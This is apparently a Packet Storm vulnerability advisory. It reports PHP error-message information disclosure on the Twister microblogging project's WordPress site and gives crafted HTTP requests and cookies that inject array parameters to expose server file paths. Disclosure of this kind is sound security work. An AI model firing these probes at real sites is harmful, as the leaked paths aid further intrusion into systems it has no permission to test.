Lucene search
Juan Carlos GarciaPACKETSTORM:124763HistoryJan 13, 2013 - 12:00 a.m.
Twister Peer-To-Peer Microblogging Information Disclosure
2013-01-1300:00:00
Juan Carlos Garcia
packetstormsecurity.com
16
`========================================================================
TWISTER Peer-To-Peer microblogging Multiples Application Error Message ( and disclosing sensitive information)
========================================================================
TIME-LINE VULNERABILITY
Multiples Advisories but Not Response Not Fixed
-----------------
Alerts summary
-----------------
Application error message
**********************
/
author
cat
comment_author_email_46104838c3366e1644fd983230bdf8c5
comment_author_url_46104838c3366e1644fd983230bdf8c5
feed
m
s
wordpress_46104838c3366e1644fd983230bdf8c5
wordpress_logged_in_46104838c3366e1644fd983230bdf8c5
/wp-comments-post.php
author
comment
email
url
/wp-login.php
comment_author_email_46104838c3366e1644fd983230bdf8c5
comment_author_url_46104838c3366e1644fd983230bdf8c5
redirect_to
user_email
user_login
wordpress_46104838c3366e1644fd983230bdf8c5
wordpress_logged_in_46104838c3366e1644fd983230bdf8c5
I. VULNERABILITY
-------------------------
#Title: TWISTER.NET Multiples Application Error Message ( disclose sensitive information)
#Vendor:http://www.twister.net.co
#Author:Juan Carlos GarcΓa (@secnight)
#Verified: Francisco Moraga (@BTShell)
#http://asap-sec.com
II. DESCRIPTION
-------------------------
Twister Peer-to-peer microblogging is the fully decentralized P2P microblogging
platform leveraging from the free software implementations of Bitcoin and BitTorrent protocols.
III. PROOF OF CONCEPT
-------------------------
--Attack details---
Application error message
-------------------------
Vulnerability description
*************************
This page contains an error/warning message that may disclose sensitive information.
The message can also contain the location of the file that produced the unhandled exception.
Affected items
---------------
/
/wp-comments-post.php
/wp-login.php
Cookie input comment_author_email_46104838c3366e1644fd983230bdf8c5 was set to sample%40email.tst
Error message found:
<b>Warning</b>: trim() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/plugin.php</b> on line <b>199</b><br />
URL encoded GET input author was set to 1
Error message found:
<b>Warning</b>: urldecode() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/query.php</b> on line <b>2519</b><br />
GET /?author[$secnight]=1&feed=rss2 HTTP/1.1
Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1;
comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst;
comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+;
wordpress_sec_46104838c3366e1644fd983230bdf8c5=+;
wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+
X-Pingback: http://twister.net.co/xmlrpc.php
Host: twister.net.co
Connection: Keep-alive
Accept-Encoding: gzip,deflate
URL encoded GET input cat was set to 1
Error message found:
<b>Warning</b>: urldecode() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/query.php</b> on line <b>1771</b><br />
GET /?cat[$secnight]=1 HTTP/1.1
Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst;
comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+;
wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+;
wordpresspass_46104838c3366e1644fd983230bdf8c5=+
Host: twister.net.co
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Cookie input comment_author_url_46104838c3366e1644fd983230bdf8c5 was set to http%3A%2F%2F1
Error message found:
<b>Warning</b>: strip_tags() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/formatting.php</b> on line <b>3261</b><br />
GET / HTTP/1.1
Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst;
comment_author_url_46104838c3366e1644fd983230bdf8c5[]=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check;
wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+;
wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+;
wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+;
wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+;
wordpresspass_46104838c3366e1644fd983230bdf8c5=+
Referer: http://twister.net.co:80/
Host: twister.net.co
Connection: Keep-alive
Accept-Encoding: gzip,deflate
URL encoded GET input feed was set to 1
Error message found:
<b>Warning</b>: strpos() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/class-wp.php</b> on line <b>331</b><br />
GET /?author=1&feed[$secnight]=1 HTTP/1.1
Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst;
comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+;
wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+;
wordpresspass_46104838c3366e1644fd983230bdf8c5=+
Host: twister.net.co
Cookie input comment_author_email_46104838c3366e1644fd983230bdf8c5 was set to sample%40email.tst
Error message found:
<b>Warning</b>: trim() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/plugin.php</b> on line <b>199</b><br />
GET /wp-login.php HTTP/1.1
Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1;
comment_author_email_46104838c3366e1644fd983230bdf8c5[]=sample%40email.tst;
comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check;
wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+;
wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+;
wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+;
wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+
Referer: http://twister.net.co:80/
Host: twister.net.co
Etc
Etc
Etc
.
.
.
IV. BUSINESS IMPACT
-------------------------
The impact of this vulnerability:
The error messages disclose sensitive information. This information can be used to launch further attacks.
V SOLUTION
------------------------
Pentesting, Review and Write Secure Code.
VI. CREDITS
-------------------------
This vulnerability has been discovered
by
Juan Carlos GarcΓa(@secnight)
Verified by
Francisco Moraga (@BTShell)
ASAP-SEC Team Members
Security As Soon As Possible (@Asap_Sec)
VII. LEGAL NOTICES
-------------------------
The Author accepts no responsibility for any damage
caused by the use or misuse of this information.
`